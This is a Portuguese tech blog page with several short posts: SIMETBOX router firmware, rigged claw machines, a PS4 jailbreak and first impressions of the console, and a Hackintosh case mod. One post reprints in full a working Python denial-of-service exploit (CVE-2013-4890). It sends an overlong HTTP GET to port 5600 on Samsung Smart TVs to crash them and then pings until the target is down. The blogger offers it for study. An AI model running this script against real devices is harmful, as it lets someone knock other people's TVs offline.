SIMETBOX – Projeto do NIC.BR desenvolveu uma firmware para roteadores TPLINK que customizam completamente o roteador

screen-shot-2017-01-10-at-5-13-34-pm

O NIC.BR disponibilizou em no site do SIMET uma firmware chamada SIMETBOX que customiza completamente o firmware do roteador. Além de opções avançadas de firewall ele habilita também o roteador WIFI para o modo AD-HOC, Acess Point e ínumeras outras funcionalidades.

Os hardwares compatíveis com o SIMETBOX são:

  • TPLink TL-WR740N (recomendado para usuários comuns, com banda larga de até 50 Mbit/s)
  • TPLink TL-WR841ND (recomendado para usuários comuns, com banda larga de até 50 Mbit/s)
  • TPLink TL-WR1043N (recomendado para usuários que usam banda larga acima de 50 Mbit/s)
  • TPLink TL-WDR3600 (recomendado para usuários que usam banda larga acima de 50 Mbit/s)
  • TPLink TL-WDR4300 (recomendado para usuários que usam banda larga acima de 50 Mbit/s)
  • TPLink TL-WDR4310 (recomendado para usuários que usam banda larga acima de 50 Mbit/s)
  • TPLink TL-WR842N (recomendado para usuários que usam banda larga acima de 50 Mbit/s)
  • TPLink TL-MR3020 (recomendado para medições via wireless)
  • Ubiquiti Nanostation M5

Caso tenha interesse pelo projeto a firmware pode ser baixada pelo link

http://simet.nic.br/firmware/

Alguns pontos importantes é que a firmware vem preparada para o acompanhamento em tempo real da velocidade. O projeto é baseado no kernel open source OpenWRT LUCI 0.11.1.

Nos testes realizados em laboratório é possível destacar as ferramentas de métricas e também de firewall disponíveis na firmware. Vale a pena para quem tem um dos roteadores acima.

Hacking :: Desvendando as máquinas de caça brinquedos

Screen Shot 2016-04-08 at 3.21.29 AM

As máquinas de caça brinquedos é algo que já deve ter levado um bom trocado seu correto? Bom pelo menos eu acredito que gastei um bom dinheiro até hoje e acertei apenas 2 vezes. A frustração levou ao estudo e a fazer um hacking destas máquinas.

A verdade
Em verdade não é só o conhecimento, habilidade com o joystick ou mesmo sorte para se dar bem com estas máquinas. Elas são parametrizadas pelos fabricantes ou mesmo pelo lojista para a quantidade de força na garra X quantidade de tentativas ou mesmo por uma porcentagem na quantidade de acertos para uma porcentagem de erros.

Screen Shot 2016-04-08 at 3.28.27 AM

E como ganhar ?
O software que gerencia estas máquinas são salvos diretamente na firmware do equipamento ou seja não há combinação de joystick que ative o funcionamento.
Resumindo não caia nesta por que é fraude. Assista ao vídeo abaixo e entenda melhor a respeito destas máquinas.

Jailbreak para PS4 ( Playstation 4 desbloqueado )

Um Hacker denominado @CTurte postou no Twitter que conseguiu desbloquear o PS4. A técnica denominada Webkit Exploit foi o que possibilitou que o CTurt tivesse acesso a raiz do sistema como podem ver pelo PS4 Explorer. Isto ainda não quer dizer que os usuários podem ter acesso a rodar jogos piratas como aconteceu no PS2 e PS3.

Até o momento eles encontraram uma forma de rodar aplicativos sem assinatura ( homebrews ).

Screen Shot 2015-12-13 at 8.33.20 PM

Mais informações:
https://twitter.com/CTurtE
http://wololo.net/

As minhas primeiras impressões do PS4

PS4-IMG_0434Nesta semana peguei o Play Station 4 e comecei os testes. De cara vi que o console possui uma capacidade de processamento de GPU fantástica mas percebi alguns pontos negativos no console.

– O console não possui um sistema de Media Center
Com um HD de 500 GB ele resolveria minha vida pois tenho uns 20GB de fotos em meu querido PS3. Ou seja não posso aponsentar de vez o PS3;

– O console não possui suporte a servidores DLNA
No PS3 a possibilidade de executar em minha rede interna em casa os conteúdos que estão em meu servidor é algo fantástico no PS3. Já no PS4 a Sony deixou claro que não funciona.
Na página sobre o assunto a Sony diz que em contra-partida eles disponibilizam ótimos serviços de streaming como Netflix e Sony Music que podem ser utilizados para este fim $$$$;

– Jogos
A Microsoft além de ter investido uma grana legal em marketing e publicidade no Brasil, também preparou títulos que fazem valer a pena comprar o console. A Sony disponibilizou até o momento 04 títulos Tomb Raider, Assassins Creed Black Flag ( disponível também no PS3 ), Call of Dutty e Fifa 14.

Nenhum jogo exclusivo que traga a “necessidade” de comprar o console foi lançado

RESUMO:
É um console poderoso que estará redondo daqui uns 02 anos. Os hackers terão muito trabalho para criar aplicativos que tornem o console ainda mais interessante pois os Apps nativos sinceramente são brochantes

Exploit para Samsung Smartv possibilita resetar tv pela rede

Segundo os integrantes do site Itsecgames o exploit que eles desenvolveram possiblita resetar aparalhos smartv quando conectados na mesma rede do agressor. O script em Python é simples e usa a biblioteca httplib para explorar a vulnerabilidade da TV. O código para que possa ser analisado para fins de estudo está abaixo:

#!/usr/bin/python

# Exploit Title: Samsung TV Denial of Service (DoS) Attack
# Exploit Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com
# Date: 07/21/2013
# CVE Number: CVE-2013-4890
# Vendor Homepage: http://www.samsung.com
# Description:
# The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request
# As a results, the TV reboots...
# Tested successfully on my Samsung PS50C7700 plasma TV, with the latest firmware :)

import httplib
import sys
import os

print " ***************************************************************************************"
print " Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com\n"
print " Exploit: Denial of Service (DoS) attack\n"
print " Description:\n"
print " The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long request."
print " Tested successfully on my Samsung PS50C7700 plasma TV :)\n"
print " ***************************************************************************************\n"

# Sends the payload
print " Sending the malicious payload...\n"
conn = httplib.HTTPConnection(sys.argv[1],5600)
conn.request("GET", "A"*300)
conn.close()

# Checks the response
print " Checking the status... (CTRL+Z to stop)\n"
response = 0
while response == 0:
response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")
if response != 0:
print " Target down!\n"

 

Um Hackintosh a altura! Customizando gabinete do Powermac G5 para um hackintosh

hackintosh

Depois do lançamento do novo gabinete do novo MacPro veio a ideia de um novo projeto pessoal. Preparar um Hackintosh de verdade utilizando um gabinete de aço do velho PowerMac G5. O gabinete é fantástico, além de ter muito espaço, refrigeração ele é muito mais estiloso que o novo gabinete black do MacPro.

Custo do projeto
R$ 1.350,00
Continue reading